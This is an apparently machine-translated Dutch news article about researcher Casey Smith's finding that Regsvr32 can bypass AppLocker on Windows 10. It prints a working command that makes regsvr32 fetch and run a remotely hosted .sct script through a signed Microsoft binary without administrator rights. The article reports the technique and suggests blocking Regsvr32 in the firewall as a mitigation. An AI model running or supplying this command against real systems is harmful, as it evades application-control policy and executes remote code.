Regsvr32 kan worden gebruikt om applocker op Windows 10 te omzeilen

Video: Regsvr32 Disable in Windows 10 Regsvr32.exe 2024

Video: Regsvr32 Disable in Windows 10 Regsvr32.exe 2024
Anonim

Een onderzoeker uit Colorado die de naam draagt, Casey Smith, heeft ontdekt dat Regsvr32 kan worden gebruikt om AppLocker op Windows 10 te omzeilen, en dit is een groot probleem voor computergebruikers, met name in de zakelijke omgeving.

AppLocker werd voor het eerst geïntroduceerd in Windows 7 en Windows Server 2008 R2. Het is ontworpen om beheerders in staat te stellen te specificeren welke groep of gebruikers kunnen profiteren van sommige of alle applicaties op basis van de unieke identiteit van bestanden. Als u een persoon bent die AppLocker gebruikt, moet het algemeen bekend zijn dat het kan worden gebruikt om bepaalde regels te maken waarmee toepassingen kunnen worden uitgevoerd of gestopt in hun tracks.

Voor degenen die misschien niet op de hoogte zijn, kan Regvr32 worden gebruikt om DLL's te registreren en afmelden. Dit is geen tool met één klik, omdat het een opdrachtregelprogramma is, dus alleen geavanceerde computergebruikers moeten proberen te profiteren van wat het te bieden heeft.

We begrijpen dat door deze techniek het register van het computersysteem niet wordt gewijzigd, waardoor het voor beheerders moeilijk is om te weten of er wijzigingen zijn aangebracht.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

“Het verbazingwekkende hier is dat regsvr32 al proxybewust is, TLS gebruikt, omleidingen volgt, enz. … En … je raadt een ondertekende standaard MS-binary. Het enige wat u hoeft te doen is uw.sct-bestand te hosten op een locatie die u zelf beheert, 'schreef Smith.

Voor de bovenstaande techniek zijn geen beheerdersrechten vereist en wordt het register niet gewijzigd. Bovendien kunnen de scripts via HTTP of HTTPS worden aangeroepen. Op dit moment heeft Microsoft geen patch uitgebracht voor dit kleine probleem, dus de enige optie op dit moment is om Regsvr32 te blokkeren via de Windows Firewall.

Interessant genoeg moet de softwaregigant nog reageren op dit beveiligingsprobleem waarmee zijn besturingssysteem wordt geconfronteerd. Nu het in de openbaarheid is, verwachten we iets van het bedrijf te horen, samen met gesprekken over een toekomstige patch.

Regsvr32 kan worden gebruikt om applocker op Windows 10 te omzeilen